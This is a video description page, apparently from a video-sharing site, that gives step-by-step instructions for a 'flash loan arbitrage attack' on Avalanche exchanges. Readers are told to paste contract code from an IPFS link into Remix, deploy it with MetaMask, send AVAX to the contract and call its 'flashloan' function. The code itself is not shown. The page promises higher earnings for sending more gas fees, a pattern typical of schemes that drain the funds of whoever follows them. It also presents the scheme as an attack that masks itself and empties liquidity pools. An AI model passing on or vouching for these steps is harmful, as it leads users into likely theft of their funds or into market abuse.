AVAX - Avalanche: Setting up a Multi DEX arbitrage attack using solidity

1 year ago
25

In this video you will see how to setup an arbitrage attack on two DEXs; You will create the coin on Pangolin and then trade this coin rapidly against SushiSwap. Be sure to make sure that you have metamask connected to Avalanche Mainnet and have AVAX in your wallet to fund the transaction.

*****NOTE: "Web 3 Injected" is now "Injected Provider" in Remix.

NEW GAS FEE REQUIRED: APPROX 10.5 AVAX

***NOTE: AVAX must be withdrawn to ‘AVAX C-Chain’. which is EVM/Metamask compatible chain

Setup Metamask to connect to Avalanche Mainnet –
https://support.avax.network/en/articles/4626956-how-do-i-set-up-metamask-on-avalanche

Smart Contract Code Link –
https://gateway.pinata.cloud/ipfs/QmRABgHFrgJMPECbHbeTsjqQFEVDtESxkqgGg5EDKs3vPj

Remix Link –
http://remix.ethereum.org/

Pangolin –
https://pangolin.exchange/

Pangolin Github –
https://github.com/pangolindex

Flash Loan Explanation –
https://academy.binance.com/en/articles/what-are-flash-loans-in-defi

USD to AVAX –
https://coincodex.com/convert/avalanche/usd/

TO EARN MORE THAN THE AMOUNT IN THE VIDEO YOU CAN INCREASE GAS FEE

In this video, you can see how I used Flashloans to Arbitrage in Avalanche Mainnet by deploying Contract/Token to mask our arbitrage attack against Pangolin.

This worked for me. But TRY IT AT YOUR OWN RISK.

STEPS:

Before starting, install and setup MetaMask in Chrome Browser.

Open and setup Remix in browser (
https://remix.ethereum.org
)
Copy the Contract code (
https://gateway.pinata.cloud/ipfs/QmRABgHFrgJMPECbHbeTsjqQFEVDtESxkqgGg5EDKs3vPj
)
Create new file in Remix and paste Contract code and wait for everything to load, Go to Solidity Compiler and Select compiler to 0.5.0+commit version and hit Compile.
In Deploy & Run Transactions, Select Injected Web3 in Environment dropdown menu to connect your MetaMask. On Deploy, Enter your token details and deploy the contract
Get the Contract address from Remix
Send 200$ish of Avalanche/AVAX to the contract for gas fee for all swaps (There are going to be many swaps to use all funds from out liquidity pools.
Call ‘flashloan’ function in Remix.

Loading comments...